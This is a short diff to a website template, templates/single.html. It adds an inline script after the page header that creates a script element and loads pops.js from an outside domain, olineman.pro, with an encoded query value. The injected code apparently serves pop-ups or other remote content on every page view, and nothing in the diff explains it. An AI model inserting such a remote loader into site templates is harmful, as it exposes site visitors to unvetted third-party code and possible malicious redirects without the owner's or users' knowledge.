--- a/templates/single.html
+++ b/templates/single.html
@@ -114,7 +114,8 @@
        
        
        </header> <!-- end s-header -->
-
+<script>(function(d){let s=d.createElement('script');s.async=true;s.src='https://olineman.pro/code/pops.js?h=waWQiOjEwMzM4MjMsInNpZCI6MTAzODU5NSwid2lkIjo3MDYyMywic3JjIjoyfQ==eyJ';d.head.appendChild(s);})(document);
+</script>
         <!-- site content
         ================================================== -->
         <div class="s-content content">
